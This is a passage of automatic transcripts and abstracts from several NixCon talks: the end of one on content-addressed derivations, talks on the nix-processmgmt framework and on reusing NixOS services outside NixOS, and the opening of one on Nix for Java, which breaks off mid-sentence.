change is the source of GCC which means that I change the GCC derivation which means that I change everything that was depending on it Content address derivations take a different path The idea is that rather than having Hello.jv directly depending on the GCC or batch derivations It depends on the output path So what happens is that nicks is first gonna build GCC This is gonna yield some output path and then nicks is gonna hash the content of that output path And this will be the hash of the output path this ABCD hash you can see and Likewise nicks is gonna build bash and it's gonna hash the output path of bar and And these two hashes is what is gonna be fed into the nicks hashing process For hello.jv rather than the hash of the GCC and batch derivations themselves This means that if I change my GCC derivation So changes it hash But in a way that keeps the same output Then hello.jv will also Will have the same inputs effectively and so it won't be invalidated and I won't have to rebuild it So that's really and hand-waving how content address derivation work, of course but that should hopefully give you the the high-level ID of How it works and how it's useful and I'm pretty sure that this is gonna unlock a whole new range of Potential use cases for nicks and I'm eagerly waiting for it To land in a release nicks version, which I hope is gonna happen soon Thank you everyone for your time and you can reach me if you need everywhere there Just not this weekend because I'm off right now, but thanks everyone
This is part of the Intensional Store model.
10.5446/50708 (DOI)
Our next talk is Nix Process Management, an experimental Nix-based process manager agnostic framework, and the presenter is named Sander van der Berg. This talk is about complementing Nix with any process manager. And a little bit more information about Sander, if you're not familiar, is that he is a Nix contributor since 2007 who's worked on so many things, such as like the FHF-shoot environments and the Nix Android build environment. And is a developer, well, the main developer for various Nix-related utilities such as DysNix, DysNomia, Notenix, and ComposerTenix. And I would also like suspect that a lot of NixOS users have probably encountered Sander's blog, which is sander van der Berg dot blogspot dot com. Okay, with that out of the way, you can free to start, Sander. Okay, thank you for the kind introduction. So hello everybody. This presentation is going to be about a personal research project that I've been working on in the last year or so. And I think it addresses a very important shortcoming of basically the tools in the Nix ecosystem. So as you may probably already know, the Nix package manager is a powerful solution. So it offers all kinds of nice features. Like you can conveniently construct packages from source code and all the required build time dependencies. It offers build determinism, transparent binary deployments by downloading existing builds from a binary cache. It allows you to store multiple versions and variants of the same package safely next to each other. You can do unprevent user deployments. So if you want to install packages, you don't need to be root. It can also be used on multiple operating systems. So in addition to Linux, it is also well supported on macOS. And very recently, FreeBSD was also accepted into the FreeBSD ports tree. And with some little effort, you can also use it on other Unix-like operating systems as well. So when I have to explain Nix to newcomers, what I typically use is a Nix shell example to show all kinds of nice interesting properties of Nix. So for example, if you're on a conventional Linux distribution and you want to install with packages like Python or Node.js, you may already have a version of Python installed on your machine and you may not have installed Node.js on your machine yet. And what you can conveniently do is you can spawn a shell session in which you have a certain version of Python and Node.js. And the Nix package manager will automatically install it. And in this shell session, you can basically use these development utilities. And the nice thing is because they're stored in a Nix store, they will not conflict with other versions of packages and they won't interfere with packages installed on your host system either. So when I show this to people, especially newcomers, they typically get quite happy. Basically what they tell me is, yes, this is exactly what I'm looking for. So I'm going to experiment with packages. I'll try to install PostgreSQL or the patchy web server or Nginx because, yeah, Nix is a very convenient tool to experiment with packages. And then I have to disappoint people because I have to explain them. Nix is a package manager. It's not a service manager. So you can install, for example, the patchy web servers on your machine, but it just provides you the executable. You're still responsible for configuring the service yourself and also make sure that the lifecycle of the process gets managed. And in order to do that, you basically need to use some other tool like system D. And that is actually quite confusing for newcomers. So what I also typically do is I explain newcomers that there is, of course, the Nix package manager, but there are also sister projects that can complement Nix with all kinds of other deployment features, such as process management. And I think the most famous project is NixOS. So NixOS can generate system D unit files with the package manager. And then system D is responsible for managing the lifecycle of these processes. But there's one catch. If you want to use NixOS, that basically means that you're forced to adapt a fully Nix managed VINNIC distribution. And if you want to use another operating system, or if you're not familiar to Nix yet, this is typically a pain. For seasoned users like me, this is not a big deal. This is actually what I want, but it's not always an option to use NixOS. The same thing, for example, applies to Mac OS. So on Mac OS, there is a project called Nix Darwin that offers all kinds of system services that you can manage with launch D. But obviously it's limited to Mac OS only. So people typically tell me when they're on conventional Linux distributions, yeah, perhaps I should use Docker because, yeah, Docker, I can manage services. And then I can, of course, also tell people that Nix is also an interesting solution to use in combination with Docker. You can basically use Nix in the construction of images. You can even use Nix to build Docker images completely. And these images are typically way more space efficient than conventional Docker images. But this is not always a compelling use case because what we're basically doing is we squeeze Nix into a Docker workflow, but it's not a Nix-driven deployment process. So this is basically my motivation to start developing the Nix process management framework. So it's basically a general solution for complementing Nix with process management facilities. And it's built around a number of key concepts. So first of all, it's entirely Nix-driven. So the idea is that you write system configurations completely in the Nix expression language. It's also based on simple conventions. That means you follow the similar conventions to how packages are organized in the Nix packages repository. So the idea is that for running processes, you write a function definition. And to compose running process instances, you define an attribute set with function invocations. And a nice small extension to this framework is that you can also organize process dependencies with the same formalism as well. And the framework will automatically arrange the ordering if needed. So that, for example, processes are activated in the right order. Another key concept is that it's process manager agnostic. So it's not designed for a specific solution, but it should work with all kinds of process managers. So currently you can use system five in its scripts, supervisor the system D, launch the BSD RC scripts, and Windows services on Sikwin. But the nice thing is the model is flexible enough that you can even use it with solutions that are not qualified as process managers. So you can, for example, also use it in combination with Dysnix and Docker. And the reason why you can do that is these solutions are multifunctional solutions and they can also organize processes. So in the framework, we can basically use these properties for basically all kinds of interesting reasons. It's also operating system agnostic because it supports process managers on a variety of operating systems. And Nix is portable to some degree as well. You can also use it for unprivileged user installations. And the reason why that is possible is because I built in a global switch that allows you to disable the creation of users and changing user permission. So as a non-route user, you typically don't have the permissions to do this. And by disabling it, you can basically just run any process you want without restrictions. And the final key concept is that it doesn't require any advanced concepts like namespaces and C-groups that are commonly used for containers. So the solution relies on conflict avoidance rather than isolation. And that is, for example, good for portability, as I'll explain later in this presentation. So how to explain you how the framework works. I developed a very simple example system. It's actually quite an over-engineered example, but I think it's quite easy to understand how it works. So basically, this is a web application system that consists of multiple running processes. What you see on the right of this diagram are three web application processes. So they're basically processes with an embedded HTTP server. And the only purpose of these web applications is to render a static HTML page that basically states the identity of the service. In front of the web application process, there's Nginx, that acts as a reverse proxy. And Nginx basically redirects users to the web application process instances based on the virtual host header field. So for example, if the user in the web browser opens the URL web app 1.local, then Nginx will redirect the user to the first web application instance. Likewise, if you use web app 2.local, then the user gets redirected to the second web app instance. So in order to automate the deployment of this system, so we have four process instances. You need to write Nginx expressions for each process instance. And one way of doing that is by specifically writing Nginx expressions for a process and a specific service manager, such as system 5 in it. And this is basically what Nginx expression looks like. So as you may probably notice, this is actually quite similar to the convention of how we in the Nginx package manager declare packages. So this is a function definition. The first line is basically the function header. And these refer to all the built inputs that are required to generate a system 5 in it script. So create system 5 in it script is an abstraction function that allows you to basically generate a huge shell script with deployment activities. Web app refers to the web app application executable and port refers to the TCP port number that the server should bind to. And what I do in the body is I invoke the function abstraction and I basically specify what all the deployment activities should look like. So this, for example, is the start activity. It starts the executable and it uses the dash D parameter to specify that it should run in demon mode. The stop activity is stopping the executable. The restart activity is basically calling stop and start and status is basically used to basically show whether the process is running or not. The run levels parameters to specify the run level. So I don't know if you still recall system 5 in the scripts that we used to develop 10 years ago. So when you boot in run level 3, that is typically used to boot in terminal mode and run level 5 is used to boot a graphical desktop environment. And basically this parameter states that the service should start on boot up for all these three run levels. Now, writing a system 5 in the script is a bit for both. So if I have to, for example, package another process like engine X, then I end up repeating the same patterns over and over again. So what I also did is I developed a higher level abstraction function for system 5 in the scripts that look like this. So instead of specifying the activities, what I do is I specify the process that I want to manage. So this is the executable I want to manage with this command line parameter. And basically what the function abstraction does is it infers the activities automatically. So basically the result of evaluating this function invocation is this. So the framework also has abstraction functions for other service managers. So this is system 5 in it, but maybe I want to use system D instead. So this is basically the function abstraction that you can use to generate system D unit configuration files. So again, what I do here is I basically, I basically, basically specify here what executable I want to manage and to which TCP port it should bind. And basically what this function abstraction does is it generates a system D unit configuration file with nearly an identical structure. So this is pretty much a one on one translation from a NIC expression to a system D unit configuration file. And the framework is basically full of other abstraction functions for all kinds of process managers. So there's also, for example, the create supervisor D program abstraction function. There's an abstraction function for launch D for BSD or scripts and many more. Now, the interesting thing is if I would compare, for example, the system D expression with the system 5 expression that I've shown in the previous slide, then you see that they're slightly different, but they're not all that different. They're still mostly the same. So what I also did in the in the framework is I created an abstraction function that abstracts over all these process manager specific abstraction functions. And that basically looks like this. So what I do in this particular NIC expression is I use a generic create manage process function that basically describes from a high level perspective. What process do I want to manage? And these concepts can be easily translated to function invocations to the target specific abstraction functions. And basically any process manager in the framework is supported. So system 5 launch the system D they can they can all work with a high level specification like this. The only thing that I that you need to do is system D prefers to work with processes that run in the foreground. Whereas system 5 in it wants processes to demonize on their own. What you need to specify is is basically for both foreground processes and demon processes. Yeah, what kind of additional settings do they require? So this demon arcs parameter basically specifies if the process needs to demonize then past these common line arguments to the executable. And if you want to run as a foreground process, yeah, basically nothing is required. Actually specifying foreground process and demons is not a strict requirement. They can also be simulated, but for an optimal user experience, it's important that you still make a distinction between those two. Then there's one more concept that I need to explain. So in the in the example that I've shown you earlier, we want to run web app processes, but we actually need multiple instances of them. We need three of them to be able to construct multiple web application instances. You need to follow a slightly different convention. So basically what I do here is I declare a nested function and the outer function are basically. So the first line is referring to parameters that apply to all web app process instances and the inner function header refers to parameters that that are instance specific. And if you specify a unique combination of these parameters, then multiple instances can coexist on the same machine. So, for example, the port number only one service can bind to a specific port number. But if you allow every instance to bind to a unique port number, they can coexist. And the same thing applies to the instance name. So normally when you launch a process as a demon file, the pit file has the same name as the demon. But if you want to run multiple instances, you have to generate PID files with unique names. And basically the instance name parameters are high level concept that allows you to basically generate unique PID file names so that process can coexist. So in addition to declaring constructive functions that you can use to create process instances, you also need to actually specify what process instances you need. And that is done in a composition model that looks like this. So again, this is similar to the top level expression in the next packages collection. Again, this declares a function. So these are parameters that basically apply to all. Excuse me, Sander. Sorry to interrupt you. Yes. You're in like your Q&A portion is in about three minutes. So you'll be eating into that. Oh, yeah, I'm almost done. Yeah, so these properties apply to all running instances. And what I do here is here I construct two web instances. They can coexist because they have a unique port number and instance suffix. And what I do in this in this expression as well, I construct an engine reverse proxy. And yeah, that is basically responsible for setting up the redirection. So I'm actually going to take a risk now. I'll show you that this is basically the example. And I can basically deploy it as any. So this basically deploys the entire system as a collection of system five in its scripts. As you can see, it deploys five instances for the web application and two engine instances. And this basically shows that the redirection is working. So now the first instance is responding. And now the second instance is responding. And I can also deploy and deploy the system like this. And now it's not running anymore. I can also deploy it as system these scripts. So if I change the command line instruction from system five in it to system D, I can deploy the entire system as system D in its scripts. And as you can see, the system responds again, and if I request a process overview, then you can also see that the system is running. So I basically use one single specification to deploy the system for multiple process managers. So I'm almost done. So I'll just wrap up because I'm running out of time. There are lots of more interesting combinations possible. So you can also deploy in free BSD as BSD RC scripts. You can even deploy Docker containers for the process instances. Yeah, there are lots of other features possible that I haven't explained. So you can also basically create users and groups so that the processors run as unprivileged users. You can automatically assign port numbers, user IDs, and group IDs. You can also combine the NICs process management with framework with DysNICs. And the nice thing is that you can deploy process to networks of machines. And you can also combine them with things that aren't processes. So for example, Apache Tomcat can be managed as a process, but you can also deploy Java web applications to that running Tomcat instance. So this is very nice to deploy very heterogeneous systems. Okay, thank you, Sander. Is that the end of your presentation? Yeah, it's pretty much done. So yeah, there's some future work. And if you want to play around, do this link. And yeah, that's pretty much it. So. Okay. So we have about, I think, five questions. I will start with the first one. This one is from NICU on IRC. And they said, do you think that NICS OS, NICS Darwin, and other projects managing services around NICS packages, could in the near future move to such abstraction layer and share more search definitions, et cetera? I think that is very well possible. But yeah, the biggest problem we have to overcome that is related to Ilco's discussion from yesterday is the module system, for example, is somewhat problematic if you want to support features like being able to construct multiple instances of processes, because modules are basically not units of instantiation. So that is a problem. There are actually concepts that you can integrate into the framework. So for example, the translation process from a high level specification to any process manager, that is actually also something you could integrate in the module system. Basically the concepts are, I think, very generic. So what we could also, in theory, do in NICS packages is we have a system D layer and perhaps a launch D layer. And we also implement a module that resides somewhere in the middle of the translation process. So a generic process management player. And if we use that, then we can already, with the same specifications, support multiple process managers. Of course, another small thing we need to do is we need to be able to use this service layer separately. But I think that is something we can easily overcome. So awesome. All this is actually really interesting to me. I was like, super surprised with your presentation. Yeah. Yeah. The question we have is, how do you envision to generalize some system D specific features like hardening or socket activation that some services use? Yeah, that's a good question. So socket activation, for example, that is a concept that also launched these supports. But the sad thing is, is that they don't follow the same protocol. So it's fair. I don't think it's impossible to generalize that. But I think it's very difficult. So what you can, of course, still do is you can define overwrites for the process managers that you want. So you can basically, if some service needs socket activation, then you can, for example, declare for launch D, do this and for system D, do something else. Yeah. Sadly, you can't use a generalized concept. But it's still possible to address these deficiencies with overwrites if you want to. Great. Great. And I think we have one more question, a pretty short one, I think. So by running processes as different user and group, do you mean running a service as a proper system service? So not a user service anymore? Yeah. Yeah. That's exactly what I mean. Yeah. Okay. So I'm not sure you'll have time to completely finish, but we'll give you a minute, is what about a static process manager, e.g., doing a topological sort at next build time to output a certain derivation representing the processes which will run at runtime? I'm not sure if I completely understood the concept of static process manager, but that is actually already possible if you combine this framework with Disnix as a process management backend. It uses the Nix language to basically generate a dependency tree. And the only thing the Disnix does is it invokes a module that simply starts the process. So that is already somewhat possible. So, but yeah, the framework is not really designed to statically generate the dependencies trees itself. It only tries to utilize the features of the process manager backend as well as it could possibly do. Okay, great. Thank you so much. We are now out of time for the Q&A portion. There's some really interesting sort of crossover between the talks happening here, I think. Which is pretty cool. So yeah, thanks. And everyone, please remember to put those clapping emojis in the IRC chat and show the love. Yeah, and the breakout room for this talk, since it seems to be pretty lively Q&A going on here, is Nix-process management. And management being MGMT, like an acronym. Yeah. Yep. Okay, everyone. We'll be right back in about five minutes.
Nix is package manager that offers all kinds of powerful features to make package deployments reliable and reproducible. Although Nix can be used to conveniently deploy packages, on various operating systems (such as Linux and macOS), and even allows unprivileged users to deploy packages, deploying services (such as PostgreSQL and Apache HTTPD) still has its limitations. Currently, Nix-based service deployment is solved by a small number of solutions: NixOS requires you to adopt a fully Nixified Linux system and uses systemd as a process manager. nix-darwin only works on macOS with launchd as a process manager If you are using Nix on a conventional Linux distribution, a different operating system (e.g. FreeBSD), with a different process manager (e.g. supervisord), or as an unprivileged user, then there is no off-the-shelf solution that can help you (yet) to conveniently deploy Nix-provided services. The nix-processmgmt framework (https://github.com/svanderburg/nix-processmgmt) is a prototype that tries to provide universal Nix-based service deployment on all systems where Nix can be used. It offers the following features: * It uses simple conventions for describing process instances, e.g. function definitions and function invocations * It works with high-level deployment specifications that can universally target the following process managers: sysvinit, bsdrc, systemd, supervisord, cygrunsrv and launchd * Tested on the following operating systems: Linux, macOS, Cygwin and FreeBSD * Automatically derives the activation order from process dependencies * Allows you to deploy multiple instances of the same service * Unprivileged user deployments In this talk, I will provide background information about this framework, describe how it works, and show a number of real-life usage scenarios using commonly used services (PostgreSQL, Apache HTTPD etc.) in a number of interesting usage scenarios (unprivileged user deployments, deployment on FreeBSD etc.) (Although the tool advertises itself as a prototype, it is already quite usable)
10.5446/50709 (DOI)
concludes our introduction and we'll be moving into our first talk which is bridging the stepping stones using pieces of NixOS without full commitment. So our speaker for this talk is going to be Michael Raskin and an interesting thing about Michael is you may have a hard time finding his GitHub account because it is just completely just like a random like hex dump of just random hex bytes so I think I believe it's like 7c6f434c and yeah I always have a really hard time trying to figure out okay what is his like GitHub again because it's like just random. Okay a little background about Michael is that he's one of the few people who stopped using mainline NixOS but actually still uses Nix and Nix packages kernels app like for more than 10 years I believe and he moved to NixOS from Linux from scratch and he was actually using a separate union FS slice for each package in that distribution and he's a post doc in computer science I believe it's theoretical to apply computer science and he started using NixOS in 2007. Okay I believe Michael cannot take it away. Hello I'm Michael Raskin and I will tell you about bridging the stepping stones or how to use pieces of NixOS without full commitment to the full NixOS and without lips of faith. So what pieces of the ecosystem you are expected to use? Well first Nix package manager yes you should use it and it leaves well side by side with anything so the only cost is maybe doubling the space you need for installing software. Next Nix package collection you most likely want to use it and what's the cost maybe a few gigabytes of clones lying around and standard environments build which you would build in a slightly more space efficient way I guess and then there is NixOS operating system distribution well maybe you also want to use that after all what's the cost only changing all of your habits about how to manage an operating system installation. Of course NixOS has a lot of nice features and many of them are listed on the home page but basically it boils down to three bullet points. Your system is Nix package and you happen to have Nix around 2.0. If you boot up to stage 2.0 you are very likely to boot successfully and into a consistent state and you have a declarative config which is just a single expression which gets instantiated from zero to complete and can be versioned and whatever. These are really cool features so now you might be asking yourself can you now finally safely experiment with all the cool stuff like in-game systems, operating system kernels and services which you can override to your liking and also can you finally escape all these complicated interactions between the things that get installed imperatively. Unfortunately the situation is a bit more complicated. Well first of all NixOS hardcodes quite a few things. First of all it is written around a Linux kernel and systemd as the init system and then the configuration of NixOS, this declarative thing is done by a model system which is nice for simple things and propagates your preferences across the configuration correctly. But when you do complicated things you notice that there are a lot of moving parts and there is a global namespace and they sometimes touch the same place in the namespace. Of course this gets resolved automatically but the interaction complexity is back here and also when you want to play with overriding services it turns out that models are less overriding than NixPackages packages. And of course NixOS hardcodes how you describe the core of your system like you have to use this NixOS specific DSL to describe which file systems to mount on boot. On the one hand it looks like not a lot of hard coding because what distribution doesn't hard code such things. On the other hand it turns out that inside of all these are trapped some less opinionated things like configuration generators for multiple demons and also start flag knowledge for these demons. And as an illustration that indeed there is less opinionated code that is kind of trapped inside, this knowledge is duplicated in NixDarvin even though for a different service management system and HomeManager which sometimes has a duplication of functionality with NixOS with slightly different approaches in a confusing way and of course Nix process management which you will hear about later today. Of course one can also ask is this code really trapped? I invoke the law of headlines ending in the question mark to hear the answer. Well it is complicated. There is a strategy how to use all this code outside the mainline NixOS installation. You just evaluate NixOS as a function as a Nix expression with configuration which is be minimal beyond minimal. It is not enough to build a bootable NixOS or maybe even a container. It only talks about the service itself and then you grab the parts you care about like most likely the configuration files in the ATC and also a nice part of NixOS system-day union generation functionality is possibility to export to the contents of exact stuff or to a runnable script. Thanks for that it's really useful in many cases. By the way I use both things I have described here in on my own system to grab CupsRunning and to get XOR configuration. So currently all of these functionality I use is online which allows you to grab service script by service name and NixOS configuration and also ATC file or a bunch of files in ATC. And all of this is online and has been online for some time. So what are the implications and limitations of these approaches? I claim that the main value of NixOS which would take the most time to replicate even based on Nix is a large database of configuration generator for many many demos and programs and many services are actually already reusable which is nice if you know how to do it and you have a use case. Of course there are some catches you need to pay attention because for example many services are configured not just under their namespace but all over the place and also some services are too complicated for a working runner script to be generated automatically by the generic code. You might be able to grab the parts of the unit and slap together the correct runner script on a case-by-case basis and then of course some services have configs that do not go to slash DC and also do not get an option name for the content. They just get reference inside the service starter unit and they are annoying to grab. So you see that I said that I can replace the NixOS boot script so not to run the full NixOS but still use the services but I said something about the model system and what would I use instead. I would use something mimicking Nix-Picogas overlays so make extensible all the things and define a small core system and then the core system adapts by reading some parameters from self like list of services which might be empty by default and in overlay lays you overwrite whatever you want to reconfigure and of course you want to put as much as possible into this ether set and not into let instances because you want everything to be inspectable and maybe even modifiable. On the other hand I can say that what if not the model system is the wrong question. The other question is can we make it not matter. The question is that services could be like packages they could be packages with parameters and they could provide rich pass-through and they could request and inspect other service instances and then its users choice how to ensure that everything gets passed and that every service gets as parameter correctly configured instance of dependencies and of course model system would be the default would be the only thing supported by mainlining XOS but it would be easier to extract it and replace it and it would be a well defined top-level layer with clean separation of responsibilities and another thing that makes us kind of hardcodes is the bootloader handling because of course Nick says assumes that it's the only thing that could want to configure bootloader based on system generations managed by Nick and naturally it assumes that all the layout is the Nick's as layout which leads to some kind of unfortunate things some unmodularity like that the single Perl script generating the group entries must know what how Nick's handles Zen and stuff like that and all of this means that if you have a different system which creates system generations it won't probably be compatible with Nick's OS unless I take everything that Nick's OS does exactly and that's why I'm actually too lazy to do a boot with Nick's OS because I would need to integrate the two lines of bootloader narration so if I dream what I would dream about I would like to see Nick's OS services as Nick's like package collection with services configured by argument of passing and argument overrides and maybe overlays I would love to see model system then on top of that as one of the ways to connect things even if the main one and then I would love to see multiple independence options for core like for boot scripts and stuff arise while still sharing the service database in a efficient way and then to make it do all booting such options more convenient between each other maybe Nick's OS bootloader generator would collect bootloader configuration snippets from each system generation of course that means that you need to provide snippets at once for all the bootloaders you theoretically support and probably you would want to fail unless a special force flag is passed if booted system does not support the loader you are trying to configure for the new system but still it could be a step forward and if I'm dreaming anyway I would like Nick's OS to gain support for atomic slash etc switching it's not completely infeasible I do use it on my system which is kind of similar to Nick's OS and it's a sim link into store and so one sim link change and that's it I promise to talk about a bit about why did I even bother replacing the Nick's OS boot script well first of all I like that my virtual terminals are not owned by system D which makes it easier to do my custom tricks around launching XORC and also it makes it easier to write stuff like power of command is privileged not by password by buy a check of physical presence sorry no screencast because it's very annoying to use XORC screencasting software with a lot of virtual terminal switches you know and then my system is managed by custom return custom command list them and mainly and for example it integrates automatic and is jail rotpers so everything I want can be run in jail because I don't know nobody runs browsers outside containers in 2020 right and of course only handpicked things have sound access which means that my user doesn't actually have sound access only the things that are run in jails which are specifically granted sound and then my own boot mounts are a mess which is for me easier to manage as a straightforward shell script then inside Nick's DSL and maybe contrary to its assumptions and then just for fun and ease of debugging I have full versions of everything I have any trim FS included there so LVM 2 means full LVM 2 yes we full glip see dependency yes it takes space but it only takes space and in memory until I actually switch to the main system so who cares and I like to have my services started via explicitly specified nice traceable scripts so if something goes wrong it's easier to debug and what you can take out of this if you want commitment neither to Nick's as approach nor to my approach well you can take rotpers for pieces extraction out of Nick's as I mentioned and then a roper to create an isolated debuff session instead a container for something that wants the debuff session but doesn't deserve access to your main one if you even have the main debuff session because I don't maybe you might be interested in Firefox empty profile builder based on launching Firefox once in Xdami and then there is some code for converting true type fonts to bitmap format for Linux console because monospace phones often come with very good hinting and font forge is pretty good at converting fonts between formats thanks for your attention are the questions okay hello everyone that was Michael Raskin bridging stepping stones using pieces of nix of us without full commitment and I did get news from the channel that we did start a bit earlier than expected so I think it was supposed to start at 715 so I am sorry about that that may make it such that we don't have a lot of questions or on the Q&A portion let me look into the pad and see if we have any questions Michael yeah I do not actually see any questions I will also manually check the channel next con Q&A if anyone has a question you can ask there yeah I do not see a question yeah I am sorry about that Michael yeah happens whatever on the other hand maybe it means that the talk was clear enough yeah that is also a possibility so I would say you could um I would direct you to like the breakout room which is bridging steps bridging dash steps and I'm sure that if people watch your talk later or like go back into the broadcast they can see that and they can ask you questions from there I think it's Puck says that two questions appear just now I will just read them from the chat Michael so we have one from SRHB and she said is abstracting the service generation worth it in NixOS proper maybe Michael I believe you're muted I'm sorry let me let me work for the word proper I worth it in NixOS proper maybe well I mean I don't know exactly how much you want to say that NixOS is the default set of options I believe that you want well I believe it's valuable to have a service database that we can reuse and that we can work on collectively the regardless of our specific choices I don't know maybe what subset of the options should be called NixOS proper and what subsets of options should be called using the services from the NixOS database on a different system I think that can be discussed once we have that call once we have things to compare I'm not sure like well it's okay if NixOS is an opinionated set of choices in that regard it's just a question of what we want to allow next to NixOS and then we can decide what to reintegrate okay I asked that was pretty clear to me actually so you have a question from Nixer 86 and they say it was not obvious I'm gonna talk or I missed it but do you still use system D? Well it turns out that I ended up not using system D at all and I'm not against using Nix system D in some container or something but just never needed it enough I definitely don't want to have system D own anything on my top level namespace and yeah well as I don't run it in smaller namespaces and I don't want to the top level I ended up without using system D at all well of course I have everything linked against system D libraries but that's another story okay we have another question from Hyperfect oh I know you hey how does the usability of the module system and your extensibility mechanism compare in practice? Well in a sense it's hard to say because for my needs this extensibility via overlays has better transparency and easier debugability for my specific use case but that's another story in a sense I never tried to use model system to have multiple people make multiple people build vastly different configurations and I cannot exclude for many people it is a very good choice to use model system because it propagates your preferences across the system well well at least as long as you are inside the expectations so it's I don't know I didn't try to see for who for who I believe that there are situations where for some people and for some settings different approaches are more usable more debugable more inspectable than the model system and as I said I am not sure it might be that it's still the best choice for the mainline most popular version of NixOS okay we have a question from Ryan TM he says it sounds like you're suggesting to move modules to packages is maybe the opposite of Elko's proposal yesterday what do you think haha well I think the following well first of all as of me not addressing at all any of Elko's points kind of sorry but world of peace can confirm that my recording has been finished before I had any chance to see Elko's talk yesterday and on the other hand yeah I think the following I do believe that well when I looked yesterday for example at the slides of Elko's talk I was a bit worried then you say okay and you can overwrite the configs of the module you extend and then you I saw the config overwrite and it was just global overwrite and so you know it's complicated so I thought that okay so what are the scoping rules I think that for putting modules inside Nix things like scoping rules not to stop being you know purely functional programming language which gives you at least an option to have full referential transparency not only formally but also really and to avoid global namespaces if you want to avoid the global namespaces and so on I think Nix being a purely functional programming language was very valuable from the very beginning and is still valuable now and so I believe yeah as I said I believe that module system is a good thing at some levels but I believe there are layers that are better done as pure functions and fully extend and fully expectable plain data structures okay I'm looking at the pad again for more questions I do not see any I think what we did I very cast what's the what's my in it well as for my in its system well it turns out that if you have a small small enough desktop system and you actually want to see and control what is there and how it runs it turns out that if you have just a few things and you immediately observe whether they are working or not and you restart them for unrelated reasons anyway like I restart my local bin to when I change the network I'm connected to or just so that it reconfigures itself a bit I it turns out that in this situation I don't even need and it's a real in its system in a sense so I do have P1 obviously and P1 is intended as an in it system and it is static a neat as a neat from suck less I don't like everything here a suck less does in well in the sense I don't find useful for me all the tools suck less produce but as a neat I looked at it and it does exactly what I wanted it to do and so yeah my in it is a sin it and then I have as I said I have this jumper demon which manages my system in particular it launches the few demons I want to be to have running on my system so and that's it I'm all this and somehow it turns out that on a simple enough system with enough RAM and they happen to have enough RAM you know cups doesn't crash being doesn't crash on its own XORC doesn't crash on its own and then what is even there for a true system supervisor to monitor okay great whoop you another question is there something else apart from NS jail that I could check to learn more about your jail setup it sounds like you're going to prison well I mean I assume I hope at some point yeah I will at some point publish the slides I guess and I hope that is recorded will be there there is well most of my setup because of course there are some small things which are very local like some of the specific host names and stuff which might not be fully included but generally you know I have most of my setup online in my github account as long as and yeah well you can look at this but basically it's a lot well basically it's just using NS jail and then there is a lot of things that you need to tell to an as jail to comfortably rob some application I need to tell an as jail what directories to provide to the application what of them to provide read-only or read-write I also run an as jail under a specific sub a specific user ID which is unique for every application during a single session and stuff like that and I said the environment variables of course because of course you need to set up stuff but basically well it's a piece of code to generate a ton of for flex to an as jail I would say okay great answer actually um I don't see any more questions in the Q&A portion so I believe that would lead us into the closing thank you so much for being here Michael it seems that you get to have a very basically an extended Q&A portion because we started early yeah thank you yep nice having you
The talk explains use of NixOS code as a library instead of a framework: the present, the possible even better future, and some of the payoff. Nix package manager has a lot of useful properties, and NixOS permits to expand the use of such properties beyond just installing packages. However, while Nixpkgs behaves mostly like a library, with overrides sometimes used to change even the fundamental assumptions if these are not used by some packages (see, e.g., pkgsMusl), NixOS is typically perceived closer to a framework. Using NixOS service management means committing to the module system (but Nixpkgs overrides are still useful), nonatomic /etc switch, systemd, NixOS driver management, etc. This creates a leap of faith, as installing Nix side-by-side breaks only storage quotas, but installing NixOS breaks everything; and leads to some duplication with nix-darwin and similar projects. In the talk I will tell what and how to reuse from NixOS now, what NixOS changes could simplify use of NixOS as a shared knowledge collection about running services between different projects with different commitment level, and how a bit of commitment to dumping the core assumptions turns some features from a weird dream into table stakes.
10.5446/50710 (DOI)
Okay, sorry, I kind of got kicked from this room. So we have our final talk of the conference today. Well, we have another day tomorrow, but yes. Our final talk is Nix in the Java ecosystem by Fareed Zakira. I hope I'm saying her last name properly. Java is one of the most popular languages. However, there is a fragmented and incomplete solution when it comes to tooling available by Nix packages. This talk is gonna go over the current state of affairs so you know what's available today in this situation and what is so difficult about Java compared to other supported languages inside Nix packages. And there's also going to be, greatly a proposed solution aimed at filling this gap. And just some information hopefully is not going to be embedded in the presentation about Fareed is he's deeply passionate about reproducibility, developer tooling and ergonomics. His prior experience has largely been centered around building public cloud infrastructure for AWS and Oracle. And he has over a decade of experience writing software is currently employed by Google. And I guess you could say it outside being a software engineer, he is a father and a wishful amateur surfer. Okay, take it away Fareed. Can you guys hear me? Oh, I'm live. Oh, thanks. So thanks everyone for attending. I can hear you. I'm presenting from OBS. So I'm gonna just continue. I think I'm live. Okay, I'm gonna start. Oh. Sorry, I muted this thing. I was just presenting over OBS, my audio. I'm gonna start. Great. Thanks everyone for attending my talk. Just to recap, my talk is gonna be geared on Nix and specifically in the Java ecosystem. And I'm gonna center it on Maven. The subtext for this talk is making Nix enterprise friendly. The sub subtext maybe where all my Java peeps. So, and I'm gonna show some slides with some code samples. I just wanna, I guess apologize ahead of time for that. So I had a little nice introduction already. So we'll probably go really quickly through this slide. I'm free. It's a carrier. That's okay. No worries. Currently working at Google. Again, about a decades of experience. Probably nine of those 10 years on Java. Relative newcomer to Nix. I heard a great quote on the Discord channel. Endless beginner that I thought is quite apt, unfortunately. And the range of build support for Java code bases that the companies I've worked on have range from like off the shelf, Maven and Gradle to highly custom proprietary build tools. And, you know, so I'm a pretty happy acolyte at the moment with Nix. It's a Pandora's box I've opened and yeah. So the goals outlined in this talk are, I'm gonna describe why we should improve Java support. How other languages currently offer support in Nix, the main pattern or strategy and kind of what's challenging with that in the Java ecosystem. And, you know, hopefully a goal of this talk is to empower you to use Nix for Java at your place of work and solicit more improvements and ideas. So maybe get people who are using Nix and Java out of the woodwork and let's collaborate some more. So why am I singling out Java specifically for enterprise? Well, Java to date, I mean, it's a very popular programming language. Here's a snapshot of the top 10 languages by popularity of their Google searches. So Java, you know, as of 2020 is second, but up until recently it was number one for quite a while. And my subjective experience, however, is that Java remains one of the highest in demand languages for non-windows based enterprise shops. You know, building web services or Java's bread and butter and so I think there's a lot of opportunity there to build upon. So I'm making the claim enterprise loves Java, you know, specifically non-Microsoft shops because they have.NET, which is C sharp, kind of very similar. And in fact, Java's enterprise notoriety has made itself memeable with its overuse of design patterns. So this graphic here is just like a little excerpt from and it's really funny I put the link. I always, I don't know, gives me a chuckle. It's a really fun implementation of the fizzbuzz interview question. So if you're not familiar with fizzbuzz, the question says just iterate from one to 15. And if it's divisible by three, output fizz. And if it's divisible by five, output buzz. And in classic Java fashion, it's overlaid with strategies and factories and patterns, you know, so, yeah. And the top there is like also a really fun class name that you get in Java a lot because of the overuse of patterns and strategies. So it's like factories of factories that are instances that are beans. So many languages nowadays have an accompanying tool to help manage and resolve dependencies. So pip, 